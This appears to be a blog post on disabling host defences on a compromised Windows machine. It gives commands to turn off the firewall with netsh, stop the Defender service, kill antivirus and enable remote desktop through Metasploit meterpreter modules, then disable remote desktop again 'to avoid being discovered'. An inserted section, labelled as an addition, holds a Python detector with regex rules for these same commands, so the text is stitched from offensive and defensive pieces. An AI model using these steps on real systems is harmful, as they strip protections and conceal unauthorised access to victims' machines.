Article foreword
I haven’t updated the blog in a long time; sorry, everyone. This time I’m posting an article on "Host Defense Service Start and Stop". I hope it’s useful~
Turn off the firewall
Initial state: firewall is on
Execute the following command to turn off the firewall (requires Administrator or higher permissions; privileges can be escalated if needed):
netsh advfirewall set allprofiles state off
Stop Defender
Initial state: enabled
Then execute the following command to stop it:
net stop windefend
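From the defender's side, both commands above leave a process-creation record that can be matched on its command line. The following is an added example, not code from the original post: a small detector run over constructed sample events. The event field names (host, user, cmdline) are assumptions, and the firewall rule goes slightly beyond the post by also matching the individual netsh profile keywords.

```python
import re

# Rules for the two commands shown above. Matching tolerates case, extra
# whitespace, a full path, quoting, and an optional .exe suffix.
RULES = [
    ("firewall_disabled",
     re.compile(r"(?:^|[\\/\s\"])netsh(?:\.exe)?\"?\s+advfirewall\s+set\s+"
                r"(?:allprofiles|currentprofile|domainprofile|privateprofile|publicprofile)"
                r"\s+state\s+off\b", re.I)),
    ("defender_service_stop",
     re.compile(r"(?:^|[\\/\s\"])net1?(?:\.exe)?\"?\s+stop\s+\"?windefend\"?(?:\s|$)", re.I)),
]

def detect(events):
    """Return (host, user, rule_name) for every process event that matches."""
    hits = []
    for ev in events:
        cmd = " ".join(ev["cmdline"].split())  # collapse runs of whitespace
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((ev["host"], ev["user"], name))
    return hits

def correlated_hosts(hits):
    """Hosts where every rule fired: firewall off AND Defender stopped."""
    seen = {}
    for host, _user, name in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if len(names) == len(RULES))

# Constructed sample process-creation records (assumed field names, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "SYSTEM", "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WS01", "user": "SYSTEM", "cmdline": r"C:\Windows\System32\net.exe  STOP WinDefend"},
    {"host": "WS02", "user": "alice", "cmdline": "netsh advfirewall show allprofiles"},
    {"host": "WS02", "user": "alice", "cmdline": "net stop spooler"},
    {"host": "WS03", "user": "admin", "cmdline": "NETSH.EXE advfirewall set publicprofile state off"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("firewall and Defender both disabled on:", correlated_hosts(hits))
```

A host where both rules fire close together deserves a higher-severity alert than either match alone, since administrators rarely disable both protections on the same machine.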
Turn off antivirus software
run killav
run post/windows/manage/killav
Open remote desktop
Initial state: the remote desktop is closed
run post/windows/manage/enable_rdp
Check again: the status has been successfully changed to allow remote connections:
After that, we can use the file that was generated when remote desktop was enabled above to disable remote desktop again, to avoid being discovered:
run multi_console_command -r /root/.msf4/loot/20200918170851_default_192.168.188.3_host.windows.cle_935765.txt
Check it again and it becomes